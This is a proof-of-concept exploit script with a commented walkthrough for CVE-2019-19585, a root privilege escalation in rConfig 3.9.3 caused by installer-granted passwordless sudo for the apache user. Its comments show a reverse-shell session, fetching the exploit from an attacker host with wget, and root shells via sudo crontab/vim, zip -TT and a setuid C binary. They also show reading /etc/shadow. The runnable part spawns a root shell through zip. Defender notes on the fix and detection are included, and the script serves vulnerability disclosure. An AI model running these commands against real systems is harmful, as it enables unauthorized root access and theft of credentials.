# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation
# Date: 07/11/2019
# CVE-2019-19585
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: CentOS 7.7
#
# Notes : If you want to reproduce this in your lab environment, follow these links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can notice 2 install scripts are used :
# $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
# $ grep curl install_rConfig.sh
# curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1
# curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1
#
# Looking at the install scripts, we see that the apache user is granted passwordless sudo for several binaries.
# $ sed -n 131,148p centos7_install.sh
# #SUDOERs Update
# SUDOINSTALLMSG="Updating Sudoers File..."
# echo $SUDOINSTALLMSG;
# echo -ne '##### (33%\r)'
# sleep 1
# echo -ne '############# (66%)\r'
# sleep 1
# echo -ne '##########################(100%)\n'
# echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
# # update sudoers for rconfig specific tasks
# echo '### rConfig specific Apahce configuration' >> /etc/sudoers
# echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers
# echo 'Defaults:apache !requiretty' >> /etc/sudoers
# cat /etc/sudoers >> $LOGFILE 2>&1
# echo -e "${green}Status: Sudoers Updated${reset}\n";
# echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
#
# So if an attacker has obtained web RCE / shell access as the apache user, privilege escalation can be done with multiple techniques.
#
# Example
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
#
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470
# bash: no job control in this shell
# bash-4.2$
#
# bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh
# wget http://192.168.43.245:8000/rconfig_lpe.sh
# bash-4.2$ chmod 700 rconfig_lpe.sh
# bash-4.2$ ./rconfig_lpe.sh
#
# ./rconfig_lpe.sh
# rConfig v3.9.3 - Privilege Escalation
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using crontab (ex : using vim)
###########################
# bash-4.2$ sudo crontab -e
# sudo crontab -e
# ...
# :set shell=/bin/sh
# :shell
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using ZIP
###########################
# bash-4.2$ touch /tmp/LPE.txt
# bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
# id
# uid=0(root) gid=0(root) groups=0(root)
# Proof of concept for CVE-2019-19585. Root cause is the installer's sudoers
# line quoted in the header above: the apache user may run /usr/bin/zip as
# root with NOPASSWD, and zip's -TT option supplies the command used for the
# archive test step, so that command runs as root.
#
# Defender notes:
#  - Fix: remove the NOPASSWD sudoers entry the installer appends for apache
#    (or restrict it to the exact arguments rConfig needs); every binary on
#    that line is shown being abused somewhere in the header above.
#  - Detection: sudo logging will record the apache user invoking zip with
#    -TT; the script also leaves /tmp/LPE.txt and /tmp/LPE.zip behind.
#  - Note the script has no shebang and no strict-mode settings; it is meant
#    to be run from an already-obtained interactive apache shell.
echo "rConfig v3.9.3 - Privilege Escalation"
# Any existing file works as zip input; /tmp/LPE.txt is just a placeholder.
touch /tmp/LPE.txt
# -T asks zip to test the archive, -TT replaces the test command; the trailing
# '#' comments out the archive name zip appends, so only /bin/sh runs (as root).
sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
###########################
# LPE using chmod / chown
###########################
# bash-4.2$ cd /tmp
# bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
# bash-4.2$ gcc -o privshell privshell.c
# bash-4.2$ rm privshell.c
# bash-4.2$ sudo chown root:root /tmp/privshell
# bash-4.2$ sudo chmod u+s /tmp/privshell
# bash-4.2$ ./privshell
# id
# uid=0(root) gid=48(apache) groups=48(apache)
###########################
# FILE READ using TAIL
###########################
#bash-4.2$ sudo tail -22 /etc/shadow
#sudo tail -22 /etc/shadow
#root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7:::
#bin:*:17834:0:99999:7:::
#daemon:*:17834:0:99999:7:::
# ...
# EOF